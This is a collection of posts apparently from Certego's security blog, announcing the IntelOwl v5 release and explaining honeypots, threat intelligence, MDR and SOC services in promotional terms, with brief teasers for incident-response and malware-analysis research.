For this reason we started to think and to focus about the future of the project: we want to make IntelOwl a complete Threat Intelligence Platform that people can use to perform security-related investigations of any kind.

Last year we reached the first step of this process: with IntelOwl v4 we released a fresh new revamped Graphical User Interface!

Today we are proud to announce a new major release: v5!

We heard the community feedback! During the event at Fosdem we announced that we were working in adding an aggregated and simplified visualization of analyzer results. We created it. Now, by leveraging a new plugin type called Visualizers, you will be able to create custom visualizations, based on your specific use cases!

This framework is extremely powerful and allows every user to customize the GUI as they wish. But you know...with great power comes great responsability. To fully leverage this framework, you would need to put some effort in place. You would need to understand which data is useful for you and then write few code lines that would create your own GUI.

That would speed the analysis of the results a lot if done correctly!

We strongly suggest you check all the details regarding this new release in the official Changelog and to try the new application by yourself!

Moreover this release anticipates other important crucial steps for IntelOwl:

On June 10th Matteo Lodi and Simone Berni are presenting IntelOwl at one of the most important Cyber Security events in Italy: HackinBo
On May 28th the Google Summer of Code 2023 is starting and IntelOwl is participating again with 2 new students! Welcome to Shivam Purohit and Abheek Tripathy!

As mentioned earlier, this is just another step of a long-term plan. We planned to add to the project some new exciting features that would transform it into a fully fledged Investigation platform that everyone working in cyber security could use for his own goal. If you want to be updated on everything that we are doing and participate in the discussions about the future of the platform, don’t forget that the project is public and everyone is welcome to the community around it! You can follow the project in Github here and to try the new application by yourself!

Thanks for reading and happy hunting!

Honeypot: trappole per cybercriminali

Pier Giorgio Bergonzi, Product Marketing Specialist — Thu, 27 Apr 2023 22:00:00 GMT

Non solo gli hacker si evolvono, ma fortunatamente anche le tecniche difensive e di studio degli attacchi sono in continuo perfezionamento, e se ben applicate possono dare serio filo da torcere ai criminali informatici!

Una di queste è rappresentata dagli Honeypot.

1. Cos’è un Honeypot?

Il termine Honeypot deriva dal mondo dello spionaggio militare, in cui le spie ricorrevano all’inganno - metaforicamente rappresentato da un invitate e gustoso vaso di miele - per attrarre i nemici ed estorcere a loro insaputa le informazioni. Allo stesso modo, l’arte dell’inganno viene oggi impiegata anche sul campo delle battaglie informatiche.

Un cyber honeypot è una trappola, volutamente progettata per sembrare a tutti gli effetti un reale bersaglio agli occhi dell’hacker. Lo scopo è convincere l’attaccante che ha avuto accesso al reale sistema informatico e incoraggiarlo a trascorrere il maggior tempo possibile all'interno di questo ambiente per controllarlo, studiarne le tecniche di attacco, valutarne le capacità e i livelli di sofisticazione.

Un honeypot può essere modellato su qualsiasi risorsa digitale, inclusi server, applicazioni software o la rete stessa.

Infine, ma non meno importante, un Honeypot funge anche da esca per distrarre i criminali dagli obiettivi reali.

Grazie all’analisi dei comportamenti degli attaccanti, le informazioni d’intelligence raccolte dagli honeypot aiutano le organizzazioni a potenziare i sistemi di rilevamento e di risposta agli attacchi, nonché ad adattare la propria strategia di sicurezza informatica alle nuove minacce

2. Come funziona un Honeypot?

Un honeypot assomiglia esattamente ad un vero sistema informatico e comprende le applicazioni e i dati che i criminali informatici utilizzano per identificare un obiettivo ideale.

Un honeypot può assumere diverse sembianze. Ad esempio, può essere creato per simulare un gateway di pagamento, un obiettivo popolare per gli hacker, che contiene grandi quantità di informazioni personali e dettagli sulle transazioni, come numeri di carta di credito o informazioni sul conto bancario. Può anche simulare un database, che attira i criminali a raccogliere proprietà intellettuale, segreti commerciali o altre preziose informazioni sensibili.

Una volta che l’hacker è all’interno dell’honeypot, il team d’intelligence è in grado di osservarne i movimenti, prendere nota delle varie tecniche implementate e di analizzare come le difese del sistema reggono o falliscono. Questo permetterà all’organizzazione di adattare rapidamente i protocolli di sicurezza esistenti, per contrastare attacchi simili, su obiettivi reali, che potrebbero verificarsi in futuro.

Per rendere gli honeypot più attraenti, spesso, questi contengono vulnerabilità di sicurezza deliberate ma non necessariamente ovvie. Data la natura avanzata di molti avversari digitali, è importante che l’Honeypot non sembri troppo facile da attaccare. È improbabile che una rete non sufficientemente protetta inganni un avversario e potrebbe persino portare il malintenzionato, una volta resosi conto che si tratta di una trappola, a fornire informazioni errate o manipolare in altro modo l'ambiente per ridurne l’efficacia.

3. Benefici (e rischi) degli Honeypot

Gli honeypot rappresentano una parte importante di una strategia globale di sicurezza informatica e offrono diversi vantaggi che possono essere sfruttati per migliorare la sicurezza dell’organizzazione.

Facilità di analisi

Il traffico all’interno degli honeypot è limitato ai criminali informatici. Pertanto, in fase di analisi, non sarà necessario separare il traffico generato dagli attaccanti dal traffico web legittimo. Ciò significa che il team di sicurezza informatica sarà in grado dedicare più tempo all'analisi del comportamento dei criminali informatici.

Evoluzione continua

Una volta implementati, gli honeypot possono deviare un attacco informatico e raccogliere continuamente informazioni. In questo modo, il team di Threat Intelligence potrà registrare quali tipi di attacchi si stanno verificando e come si evolvono nel tempo. Questo rappresenta per le aziende l'opportunità di modificare i propri protocolli di sicurezza e adattarli alle nuove minacce riscontrate all’interno degli Honeypot.

Identificazione delle minacce interne

Gli honeypot permettono di identificare minacce alla sicurezza sia interne che esterne. Sebbene molte tecniche di sicurezza informatica si concentrino sui rischi provenienti dall'esterno dell'organizzazione, gli honeypot sono in grado di far confluire al proprio interno anche attori malevoli, che hanno già avuto accesso all’infrastruttura e che stanno tentando di accedere ai dati, agli indirizzi IP o ad altre informazioni sensibili dell'organizzazione.

È importante sottolineare che anche gli hacker possono utilizzare gli Honeypot a loro vantaggio. Qualora un attaccante fosse in grado di riconoscere che l’ambiente a cui ha avuto accesso è un'esca, potrebbe intenzionalmente inondare l'honeypot con attacchi ripetuti per distogliere l'attenzione dagli attacchi reali al sistema informatico reale o fornire deliberatamente informazioni errate all'honeypot. Proprio per questo è fondamentale affidare la creazione e l’analisi dei dati degli Honeypot ad analisti esperti in grado preparare un ambiente non riconoscibile in quanto esca.

4. Classificazione degli Honeypot

Gli honeypot possono essere classificati in molti modi diversi. A livello più basilare, gli honeypot sono differenziabili in base allo scopo per cui vengono utilizzati.

Production Honeypot

I Production Honeypot sono quelli più comuni. Questa esca viene utilizzata dalle aziende per raccogliere informazioni di intelligence sugli attacchi informatici all'interno della rete di produzione. Ciò può includere indirizzi IP, data e ora dei tentativi di intrusione, volume di traffico e altri attributi.

Research Honeypot

I Research Honeypot sono progettati per raccogliere informazioni sui metodi e le tecniche utilizzate dagli avversari, al fine di analizzare quali possibili vulnerabilità esistono all'interno del sistema in riferimento a tali tattiche.

5. Complessità degli Honeypot

Gli Honeypot possono inoltre essere classificati in base alla loro complessità e al livello di interazione.

Low-interaction Honeypot

Gli Honeypot a bassa interazione utilizzano un numero limitato di risorse e si limitano alla raccolta di informazioni basilari sugli attaccanti. Poiché sono piuttosto semplici, è improbabile che attirino a lungo l'attenzione di un attaccante. Come indicato nel paragrafo “Benefici (e rischi) degli Honeypots”, considerato il crescente livello di conoscenze dei criminali informatici, alcuni hacker potrebbero individuare Honeypot di “basso livello” ed evitarli o addirittura sfruttarli per fornire appositamente informazioni errate.

High-interaction Honeypot

Rispetto ai precedenti, sono progettati per coinvolgere i criminali informatici per lunghi periodi di tempo attraverso una rete di obiettivi esplorativi. I team di Threat Intelligence più evoluti fanno ricorso a questa tipologia di Honeypot per ottenere una comprensione più profonda delle tecniche di attacco. Rispetto ai Low-interaction Honeypot forniscono informazioni di qualità superiore e più funzionali per adattare i protocolli di sicurezza già in uso. La maggior parte dei Research Honeypot sono considerati honeypot ad alta interazione.

6. Tipologie di Honeypot

Infine, è possibile completare il processo di classificazione degli Honeypot suddividendoli in base al tipo di attività che rilevano. Vediamo alcuni esempi:

Email o Spam Honeypot

Un Email o Spam Honeypot consiste in un indirizzo e-mail fittizio, inserito in un campo nascosto, che può essere rilevato solo da un raccoglitore automatico di indirizzi o da un crawler del sito. Poiché l'indirizzo email non è visibile agli utenti legittimi, grazie a questa tipologia di honeypot è possibile classificare come spam tutta la corrispondenza consegnata a quella casella di posta e bloccare quel mittente e il suo indirizzo IP, nonché tutti i messaggi che corrispondono al suo contenuto.

Database Honeypot

Un Database Honeypot è un set di dati fittizio, intenzionalmente vulnerabile, per monitorare le vulnerabilità dei software e le fragilità dell'architettura di rete. Il database esca raccoglierà informazioni sulle tecniche di iniezione, il dirottamento delle credenziali o l'abuso dei privilegi utilizzati da un utente malintenzionato che possono quindi essere integrate nelle difese del sistema e nelle politiche di sicurezza.

Malware Honeypot

Un Malware Honeypot emula un’applicazione software o un'interfaccia di programmazione dell'applicazione nel tentativo di attirare attacchi di malware in un ambiente controllato e non minaccioso. Consente al Team di Threat Intelligence di analizzare le tecniche di attacco e sviluppare o migliorare soluzioni anti-malware per affrontare queste specifiche vulnerabilità, minacce o attori.

Spider Honeypot

Simile all’Email o Spam Honeypot, uno Spider Honeypot è progettato per intrappolare i web crawler, a volte chiamati spider, creando pagine web e collegamenti accessibili solo ai crawler automatici. L'identificazione di questi spider può aiutare le organizzazioni a capire come bloccare i bot dannosi.

Certego Cyber Threat Intelligence

Quokka è la piattaforma di Threat Intelligence di Certego per la raccolta, classificazione, analisi e condivisione delle informazioni sulle minacce e tattiche evolute.

Quokka è il cuore delle attività di Threat Intelligence di Certego:

Riceve input e richieste di analisi (IP, Domini, File, ecc.) da honeypot, sensori e utenti;
Elabora e correla i risultati per produrre una risposta che può essere facilmente utilizzata in più contesti: avvisi automatici, analisi manuale, arricchimento dei dati, ecc.

I dati vengono continuamente aggiornati dal team di ricerca e automaticamente diffusi sulla piattaforma di Managed Detection and Response proprietaria Certego PanOptikon® , per adattare in tempo reale i sistemi di sicurezza dei nostri clienti ed identificare le minacce più innovative.

I servizi di Cyber Threat Intelligence di Certego aiutano inoltre le aziende a prendere decisioni più rapide, migliorare l’impatto degli investimenti e la distribuzione delle risorse aziendali per le attività di cybersecurity.

Per saperne di più consulta l’area del nostro sito dedicata alla Cyber Threat Intelligence.

Cyber Threat Intelligence: conosci e anticipa il tuo avversario

Pier Giorgio Bergonzi, Product Marketing Specialist — Thu, 06 Apr 2023 22:00:00 GMT

Anno 2023 d.C., il mondo della sicurezza informatica è in costante cambiamento, hacker e difensori sono in continuo conflitto per superarsi a vicenda. Chi ha il compito di proteggere le aziende sa che è fondamentale conoscere la prossima mossa degli attaccanti per poter personalizzare in modo proattivo le proprie difese e prevenire gli attacchi.

Le organizzazioni sono consapevoli che la Cyber Threat Intelligence riveste ormai un ruolo di primo piano, ciononostante la maggior parte delle aziende continua a concentrare i propri sforzi solo sui casi d'uso più basilari, come l'integrazione dei feed dei dati sulle minacce con la rete esistente, IPS e firewall, senza sfruttare appieno le informazioni che l'intelligence può offrire.

In questo articolo analizziamo il concetto di Cyber Threat Intelligence per evidenziare come la sua applicazione evoluta rappresenta oggi un’arma indispensabile per ottenere un vantaggio competitivo sugli hacker.

1. Cos’è la Cyber Threat Intelligence?

La Cyber Threat Intelligence è la capacità di intelligence sviluppata in ambito Cybersecurity.

Include la raccolta, l’elaborazione e l’analisi dei dati di sicurezza informatica multi-sorgente, utilizzando algoritmi analitici avanzati ed esfiltrazioni di informazioni, al fine di rilevare il maggior numero di possibili tipologie di attacco attraverso la comprensione degli obiettivi e metodi messi in atto dai criminali informatici.

Raccogliendo e analizzando grandi quantità di dati sulle minacce e le tendenze della sicurezza informatica, la Cyber Threat intelligence permette ai team di sicurezza IT di:

Rafforzare la postura di sicurezza aziendale tramite la comprensione dell’avversario;
Anticipare in modo proattivo gli attaccanti;
Rispondere più velocemente in caso di incidente;
Prendere decisioni strategiche per il futuro e investire il budget con saggezza.

2. Quali sono i vantaggi della Cyber Threat Intelligence?

La Cyber Threat Intelligence migliora la capacità dell’azienda di ridurre i rischi informatici, attraverso l’analisi dettagliate delle possibili minacce e dei feedback di intelligence su tutte soluzioni che proteggono la superficie di attacco.

Per poter potenziare efficacemente le strategie di sicurezza informatica di un'organizzazione, una piattaforma avanzata di Threat Intelligence deve comprendere le seguenti funzionalità:

Correlazione dei dati multi-sorgente

Diversi punti di vista producono dati e approfondimenti diversi. Una piattaforma di intelligence sulle minacce deve essere in grado di aggregare sia fonti di dati interne che esterne, per fornire all’organizzazione una visibilità più completa delle minacce che probabilmente dovrà affrontare.

Analisi approfondita dei dati

L’enorme mole di dati raccolti da una piattaforma d’intelligence potrebbe facilmente sopraffare il team di sicurezza di un'organizzazione. Per questo una piattaforma avanzata di Cyber Threat Intelligence deve essere in grado di eseguire analisi automatizzate, valutazioni e definizione delle priorità per garantire che gli analisti vedano prima i dati più importanti.

Condivisione automatizzata dei dati

Disporre di dati di intelligence sulle minacce su un unico sistema centralizzato e fare esclusivamente affidamento sugli analisti per distribuirli manualmente sulle soluzioni difensive aziendali ne limita l'efficacia.

Una piattaforma di intelligence deve prevedere la possibilità di diffondere automaticamente le informazioni sulle soluzioni di sicurezza dell’organizzazione per velocizzare le attività di aggiornamento delle difese.

Aggiornamenti in tempo reale

Molte campagne di attacco durano poche ore o minuti. L'intelligence sulle minacce che si aggiorna quotidianamente è molto limitata ed è necessario disporre di una piattaforma in grado di fornire informazioni basate sull’analisi dei dati in tempo reale.

Informazioni proattive

Sapere che esiste una particolare minaccia non equivale a sapere come arginarla. La Cyber Threat Intelligence deve poter fornire consigli pratici e approfondimenti su come l’azienda può proteggersi dalle minacce rilevate.

3. Threat Intelligence Lifecycle: dal dato grezzo ai processi decisionali

L'intelligence sulle minacce è una sfida; le minacce sono in continua evoluzione e richiedono alle aziende di adattarsi rapidamente e intraprendere azioni decisive.

Il ciclo di vita dell'intelligence è il processo che permette di trasformare i dati grezzi in intelligenza finita per il processo decisionale, fornendo un framework che consentire ai team di sicurezza di ottimizzare le proprie risorse e rispondere efficacemente alle minacce più moderne. Ha l’obiettivo di migliorare l'efficienza e la funzionalità della piattaforma di intelligence e si compone di sei passaggi che danno luogo a un ciclo di feedback per incoraggiare il miglioramento continuo delle attività di intelligence:

Requirements

È la fase di sviluppo della roadmap, in cui vengono concordati insieme al cliente gli obiettivi, la metodologia e il programma di investigazione, basati sulle specifiche esigenze aziendali.

Collection

Definiti gli obiettivi e i requisiti dell’attività, si passa alla fase di raccolta delle informazioni.

A seconda degli obiettivi, il team di Threat Intelligence si concentrerà nella ricerca di potenziali vettori di minacce, vulnerabilità esistenti e informazioni pubbliche disponibili che gli attaccanti potrebbero utilizzare per ottenere l'accesso non autorizzato ai sistemi.

In questa fase si ricorre anche all’uso delle Honeypot, trappole per i criminali che hanno l’obiettivo di ingannare l’avversario affinché colpisca il perimetro dell’organizzazione in un punto prestabilito per farlo uscire allo scoperto, studiarne le tecniche e tenerlo distante dal vero obiettivo che si intende proteggere.

I luoghi in cui cercare le informazioni di intelligence includono anche i registri di eventi di rete e accesso a risorse quali blog, forum e community presenti nel dark web.

Processing

In seguito alla raccolta, i dati grezzi e le informazioni esfiltrate vengono elaborate. Oltre alla valutazione dei dati per rilevanza e affidabilità, il più delle volte questa fase comporta attività quali la traduzione di informazioni da fonti esterne.

Analysis

Ora che i dati sono stati processati, inizia la fase di analisi approfondita per trovare le risposte alle domande poste nella fase dei Requiremets. Durante la fase di analisi, il team di Threat Intelligence lavora anche per decifrare il set di dati in elementi di azione e raccomandazioni preziose per il cliente.

Fondamentali per la fase di analisi sono le Malware Sandbox, ovvero i sistemi di scansione dei file sospetti che permettono di farli “esplodere” in ambienti controllati al fine di studiarli e analizzarli. Le Sandbox registrano ogni operazione avvenuta dal file avviato e ne tracciano il comportamento per comprendere la metodologia impiegata dagli attaccanti.

Dissemination

Il team di intelligence traduce la propria analisi in un formato da presentare ai diversi referenti aziendali coinvolti. In questa fase, le informazioni che vengono presentate sono già utilizzabili da parte dell’azienda per prendere decisioni strategiche.

Feedback

Ricevere i feedback sui report di Threat Intelligence è fondamentale per migliorare l’intero processo di intelligence. A volte gli obiettivi, così come gli asset aziendali cambiano; di conseguenza sarà necessario adattare le strategie di intelligence alle nuove esigenze e aggiungere nuove metriche da analizzare.

4. La tua azienda ha bisogno della Cyber Threat Intelligence?

Nell’attuale paradigma della sicurezza informatica, la Cyber Threat Intelligence rappresenta una risorsa fondamentale per le aziende di ogni settore e dimensione.

Le PMI possono trarre vantaggio dai dati di intelligence per raggiungere un livello di protezione molto più avanzato. Per le aziende più grandi, che hanno già al loro interno un team di sicurezza, i dati di intelligence rappresentano un vantaggio tangibile per ridurre i costi attraverso l’ottimizzazione dei processi di cybersecurity e rendere gli analisti più preparati ed efficaci.

La Threat Intelligence offre vantaggi unici a ogni membro dei team di sicurezza:

Analista IT, migliora le proprie capacità di prevenzione e rilevamento e rafforza le difese;
SOC, ottimizza le proprie attività, attribuendo la priorità agli incidenti in base al rischio d’impatto per l’organizzazione;
Incident Responder, accelera le indagini e l’assegnazione delle priorità agli incidenti;
Board aziendale, ha una visione più approfondita dei i rischi che l’organizzazione deve affrontare ed è in grado di prendere decisioni più mirate sugli investimenti e le strategie da introdurre.

Certego Cyber Threat Intelligence

Quokka è la piattaforma di Threat Intelligence di Certego per la raccolta, classificazione, analisi e condivisione delle informazioni sulle minacce e tattiche evolute.

Quokka è il cuore delle attività di Threat Intelligence di Certego:

Riceve input e richieste di analisi (IP, Domini, File, ecc.) da honeypot, sensori e utenti;
Elabora e correla i risultati per produrre una risposta che può essere facilmente utilizzata in più contesti: avvisi automatici, analisi manuale, arricchimento dei dati, ecc.

Per saperne di più consulta l’area del nostro sito dedicata alla Cyber Threat Intelligence.

Certego è il primo Threat Intelligence Provider Partner italiano di dns0

Pier Giorgio Bergonzi, Product Marketing Specialist — Tue, 28 Mar 2023 22:00:00 GMT

Certego è la prima azienda italiana a diventare Threat Intelligence Provider Partner di dns0, il primo servizio DNS interamente europeo, gratuito e conforme al GDPR, finanziato dall’Unione Europea, per proteggere i cittadini e le organizzazioni dagli attacchi di phishing e siti malevoli.

L’obiettivo è condividere con dns0 alcuni dei nostri indicatori di compromissione per proteggere gli utenti dal phishing e impedire le comunicazioni con i server Command and Control utilizzati dai malware in circolazione.

Il servizio DNS0 è stato realizzato dall'omonima organizzazione francese senza scopo di lucro fondata del 2022 dai co-fondatori di NextDNS, tra i resolver più apprezzati e conosciuti per il rispetto della privacy degli utenti.

DNS0 utilizza innanzitutto un'architettura resiliente distribuita al 100% negli stati membri europei, in decine di data center dislocati in altrettanti Paesi. In questo modo, è possibile tenere la risoluzione dei nomi a dominio sull'edge ovvero quanto più vicino possibile al client fisico di ogni utente.

L'infrastruttura di DNS0 non è orientata solo alle prestazioni ma anche alla privacy: supporta infatti tutti i moderni protocolli (DNS over HTTPS, DNS over TLS, DNS over QUIC, DNS over HTTP/3, DDR Encrypted Upgrade) per la risoluzione delle richieste in forma completamente crittografata.

DNS-over-QUIC, in particolare, è universalmente riconosciuto come il successore di DNS-over-HTTPS: fa sì che i dati tra client e server DNS viaggino in forma crittografata massimizzando contemporaneamente le performance.

Scopri di più sul progetto sul sito di dns0

5 motivi per affidarsi ai servizi di MDR

Pier Giorgio Bergonzi, Product Marketing Specialist — Wed, 22 Mar 2023 23:00:00 GMT

Il panorama delle minacce alla sicurezza informatica è in continua evoluzione. La crescente adozione di tecnologie come ad esempio il cloud, l'intelligenza artificiale e l'IoT, sebbene abilitanti al raggiungimento dei nuovi obiettivi di business, ha reso le attività di protezione della superficie di attacco sempre più complesse per i reparti IT di ogni organizzazione.

L’approccio tradizionale alla sicurezza informatica, basato principalmente su soluzioni tecnologiche come firewall, antivirus, log management e SIEM, rappresenta oggi una buona prima linea di difesa, ma non è più sufficiente per proteggere adeguatamente un’azienda dalle minacce di ultima generazione.

Oggi, un’organizzazione che vuole proteggersi efficacemente, deve includere, oltre alle tradizionali tecnologie di prevenzione, anche le attività di rilevamento, analisi e risposta agli incidenti informatici. Sebbene molte organizzazioni siano consapevoli dell'evoluzione delle esigenze di sicurezza, non dispongono delle risorse e delle competenze necessarie per gestire le complessità dei nuovi scenari di sicurezza aziendale. È qui che entrano in gioco i servizi gestiti di Detection e Response.

Il termine Managed Detection & Response (MDR) identifica i servizi gestiti di sicurezza informatica, forniti da esperti specializzati, 24 ore su 24, 7 giorni su 7, che combinano tecnologia e competenze umane al fine di:

Migliorare le attività di rilevamento;
Velocizzare le attività di Incident Response;
Mettere in campo attività di contenimento in seguito ad un attacco;
Svolgere attività di analisi per migliore la resilienza degli apparati IT.

I servizi di Managed Detection & Response rappresentano la risposta alle sfide dei reparti IT che ambiscono ad aumentare la maturità della sicurezza e ridurre i rischi informatici. Vediamole insieme:

1. Aumentare le difese informatiche

I provider di MDR sono costantemente messi alla prova da un volume e una varietà di attacchi informatici indiscutibilmente maggiore rispetto a quelli che potrebbero verificarsi in ogni singola realtà aziendale; ne consegue un livello di esperienza quasi impossibile da replicare internamente all’azienda.

È molto importante considerare che chi lavora in un grande team di MDR ha la possibilità di condividere le proprie esperienze e intuizioni con i colleghi, accelerando ulteriormente le attività di risposta e facendo esperienza di quanto appreso per applicarlo al profilo di un’altra azienda cliente prima che la minaccia possa verificarsi.

Inoltre, gli analisti che si occupano di attività di MDR hanno maggiore dimestichezza nell’utilizzo degli strumenti per la ricerca delle minacce, il che permette di rispondere in modo più rapido e puntuale al rilevamento di una minaccia.

2. Ottimizzare i carchi di lavoro delle risorse IT interne

Uno dei principali vantaggi dell’affidarsi ai servizi gestiti di sicurezza informatica è che permette alle risorse IT interne all’azienda di avere maggiore tempo da dedicare ai processi più strategici e di business.

Oltre alla mancanza di tempo, le organizzazioni faticano a ricoprire ruoli specializzati che richiedono competenze di analisi e Incident Response. Affidarsi ad un provider di MDR garantisce all’azienda l’accesso immediato a competenze di alto livello in materia di sicurezza informatica, senza la necessità di reperire e formare risorse interne dedicate.

Affidarsi ai servizi di Managed Detection & Response consente alle organizzazioni di rimanere al sicuro senza dover sforzare il proprio budget e aumentare i carichi di lavoro dei reparti IT interni.

3. Monitorare gli asset 24 ore su 24, 7 giorni su 7

Monitorare la sicurezza durante le ore di lavoro non è sufficiente, perché i criminali informatici non rispettano i normali orari di lavoro. La sicurezza informatica è una preoccupazione 24/7 pertanto anche l’approccio deve esserlo.

Una soluzione di sicurezza 24 ore su 24, 7 giorni su 7 per il monitoraggio continuo delle minacce è essenziale al fine di rilevare e rispondere in maniera tempestiva agli attacchi prima che diventino un problema.

Applicando il monitoraggio continuo, il provider di MDR è in grado riconoscere rapidamente e in qualsiasi momento eventuali attività anomale e adottare misure immediate per tenere le minacce fuori da un sistema, anche nelle ore in cui il reparto IT dell’azienda non è al lavoro. Nella fase inziale di assesment con il cliente sarà infatti possibile concordare le procedure da mettere in pratica qual ora si verifichi una minaccia al di fuori delle ore di ufficio; questo permetterà agli analisti del provider di applicare policy di contenimento immediate e al reparto IT aziendale di fare sogni tranquilli.

4. Potersi affidare ad un servizio su misura

A proposito delle policy di contenimento, i principali provider di soluzioni MDR utilizzano regole personalizzabili per definire le policy di sicurezza in base alle esigenze di ciascun cliente. Queste regole consentono agli specialisti di MDR di applicare criteri operativi e di sicurezza esatti, aggiornarli per allinearli alle mutevoli esigenze aziendali e alle nuove minacce.

Attraverso l’impostazione delle regole di sicurezza personalizzate, il team di Detection & Response del provider è in grado di filtrare in modo selettivo gli eventi rumorosi che non rappresentano un reale rischio per la sicurezza. La gestione degli alert è un’attività dispendiosa, ma utilizzando tecnologie come il machine learning e l’intelligenza artificiale, le migliori soluzioni di MDR permettono di eliminare drasticamente il numero di falsi positivi, notificando al cliente solo le minacce che rappresentano una reale situazione di rischio.

5. Threat Intelligence avanzata

Un’altra componente cruciale di un servizio di Managed Detection & Response di primo livello è rappresentato dalla Threat Intelligence.

Le metodologie di attacco più avanzate sfruttano tecniche sofisticate che non consentono il rilevamento da parte di molte tecnologie di sicurezza informatica. Un servizio di MDR guidato dalle attività di Threat Intelligence permette di rimediare a questo limite attraverso le attività di ricerca proattiva delle minacce. Combinando le informazioni di Intelligence sulle minacce esterne con la ricerca interna e gli approfondimenti di prima mano sui dati dei clienti, le migliori soluzioni di MDR riescono a identificare in anticipo tattiche, tecniche e procedure di attacco (TTP) innovative, permettendo di migliorare i processi di rilevamento, ma anche lo sviluppo di set di regole di correlazione e playbook di risposta agli incidenti.

Certego MDR: la soluzione completa per le nuove sfide di Cybersecurity:

I servizi Certego di Managed Detection & Response vengono erogati attraverso la piattaforma proprietaria di Security Orchestration, Automaton and Response (SOAR), Certego PanOptikon© che abilita le attività di monitoraggio in tempo reale, analisi e risposta degli incidenti, oltre all’interazione diretta tra il team IT del cliente e il Detection & Response team di Certego.

La piattaforma utilizza un approccio modulare per adattarsi all'infrastruttura dell'organizzazione e scalare in base alle nuove necessità.

Why you need a security operation center (SOC)

Pier Giorgio Bergonzi — Wed, 04 Jan 2023 23:00:00 GMT

What is a Security Operation Center (SOC)?

A Security Operations Center (SOC) is a centralized unit that provides security oversight for the organization. The SOC is responsible for continuously monitoring and improving the organization's security posture, as well as responding to threat incidents. SOC can be an in-house team of experts or an outsourced team. Anyway, the job of the SOC is the same: it will work to respond to cybersecurity incident, increasing the company protection and provide a fast way to respond to incoming threats. There are many benefits to working with a Security Operations Center, but the primary is that it puts you in touch with expertise that might otherwise be difficult or impossible to cultivate internally.

How a security operations center works

A SOC uses a combination of people, processes, and technology to carry out its functions. The SOC team may be made up of security analysts, engineers, and incident response personnel. The team works together to monitor the company organization's networks and systems for signs of intrusion or other suspicious activity. When an incident is detected, the SOC team will work to contain and remediate the issue. The key activities that a SOC engages in are planning and preparation, detection and response, and recovery and compliance. By Relying on a SOC the organization will be prepared for incoming threats, responding quickly, and compliant with regional regulations.

SOC Activities

There are several activities within a Security Operations Center, including managers, analysts, investigators, responders, and auditors.

Analysts and investigators are continuously looking for incoming threats, checking interactions and incidents for malice.
Responders are the individuals that handle incoming threats once they've been detected by the analysts and investigators. They work to minimize the damage of the threat and, ultimately, remove it.
Auditors continuously look through your current practices, updating outdated policies and making sure that you're following the latest recommendations in cybersecurity.

Managed Detection & Response SOC

A managed detection and response (MDR) SOC provides security operations support as a managed service. An MDR SOC is typically operated by a third-party provider and is responsible for continuously monitoring and improving the security posture of the organization's networks and systems. Compared to a SOC within the company, a third-party SOC, based on MDR, provides additional services and functions, such as alert triage and investigation, incident reporting and escalation, remote response, and threat hunting.

Why should you work with a service provider SOC?

Working with a third-party SOC gives you instant access to a specialist body of knowledge. SOC teams have a deep understanding of security threats and vulnerabilities. This knowledge can help organizations proactively identify and mitigate potential risks. A SOC can also give you access to a wealth of knowledge and experience that you may not have in-house. SOC analysts are experts in cybersecurity, and they can help you to understand the threats that you face and how to best protect yourself against them.

Raise up a new level of expertise

Working with a SOC can help you to raise up a new level of expertise in cybersecurity, like having the opportunity to learn from the best in the business and to develop your own skills and knowledge.

24/7/365 monitoring

SOC analysts are on hand 24/7/365 to monitor your systems and to respond to any threats that they identify. This can help to ensure that critical systems are always protected. In today's world, 24/7/365 protection is a must, as you never know when or where a potential threat is going to come from. SOCs give you the confidence that no matter when a threat hits your systems, you'll be ready to respond.

Improve your cybersecurity posture

SOC teams can help organizations to improve their overall security posture. Your security posture isn't just important for responding to threats, but also in deterring them. Having a more robust cybersecurity presence can help make you less of a target in the eyes of bad actors.

Centralized security management

Last but not the least, a third-party SOC teams can provide you with a centralized point of contact for all security-related issues. This can help to streamline your security management and make it easier to respond to incidents.

Invest in a strong cybersecurity protection with Certego MDR

Certego Managed Detection & Response services are powered by a proprietary Security Orchestration, Automaton and Response (SOAR) Platform, named Certego PanOptikon© which enables the process of Real Time Security Monitoring and Incident Response. The Platform uses a modular approach so it can scale up with the organization’s infrastructure and it can be easily adapted to its actual needs. It enables and supports processes of data gathering, security events correlation and analysis operations, in real-time.

Thanks to the in-depth investigations, provided as-a-service by the Certego Computer Security Incident Response Team (CSIRT) with a full remote coverage h24x7x365 eyes on glass, both in italian and english languages, it is possible to quickly detect, investigate and respond to the most advanced cyber threats.

Thanks for reading!

How to handle a distributed crypdominer AD worm

Gabriele Pippi — Sun, 01 Jan 2023 23:00:00 GMT

This and last week, the Certego Incident Response team handled a powershell based Active Directory compromise on multiple of our customer networks. Although the actors seemed to be intent on spreading a Cryptominer malware, due to some technical aspects the campaign could hide a second goal. Considering that more and more attacks are aimed to making lateral movements to compromise enterprise domains, today we decided to share with you some details of detection and response actions performed by Certego IRT to handle these threats.

Note: to prevent antivirus from blocking this site we are forced to share the code via screenshots, the main samples have been uploaded to virustotal.

Dragonfly by Certego

Matteo Lodi — Sun, 01 Jan 2023 23:00:00 GMT

Certego has always been strongly involved in researching new ways to analyze malware. We have been working for some time on new projects aimed to evolve how the threat intelligence analysts work and what kind of tools they need. You may have heard of the open source project IntelOwl and the recognition it received by the community: we have just reached 2k stars on Github in less than 2 years! But it is not the only one! We started experimenting and working closely with the community that develops binary emulation frameworks. And we came up with a new idea! A next generation malware sandbox built on binary emulation tools. We called it Dragonfly. Today we are proud to announce that we are finally ready to publish the Alpha release of this project to the community! “So yeah, this is all very exciting! but how does it work?”

Advance VBA macros

Gabriele Pippi — Sat, 31 Dec 2022 23:00:00 GMT

One of the most common techniques for getting a foothold on a network client is based on Office files containing a malicious VBA macro. VBA macros are still widely used in a business context and, despite the mitigations offered by security vendors and Microsoft, it is still essential to detect evasion techniques in order to catch smart attackers.

All the tests carried out are aimed at encouraging the red teams to test new bypass techniques and improving the detection of olevba, mraptor and vipermonkey public projects.

Certego listed among the world’s top 250 Managed Security Services Providers by MSSP Alert

Pier Giorgio Bergonzi — Sat, 31 Dec 2022 23:00:00 GMT

MSSP Alert is the global voice of the Managed Security Service Provider industry.

Covering managed security service provider (MSSPs), managed detection & Response and cybersecurity news, his exclusive business, technology and cybersecurity content empowers any company around the world to find the best Cybersecurity partners.

Thanks to our constant research and development activities, threat intelligence networking and several collaborations with an ever-increasing number of customers all over the world, from any market, Certego is proud to be part of the list of the top 250 international Managed Security Services companies of this year.

2022 represented a year of great satisfaction for Certego, which saw us engaged in several successful projects and activities of Cybersecurity, Incident Response and Threat Intelligence.

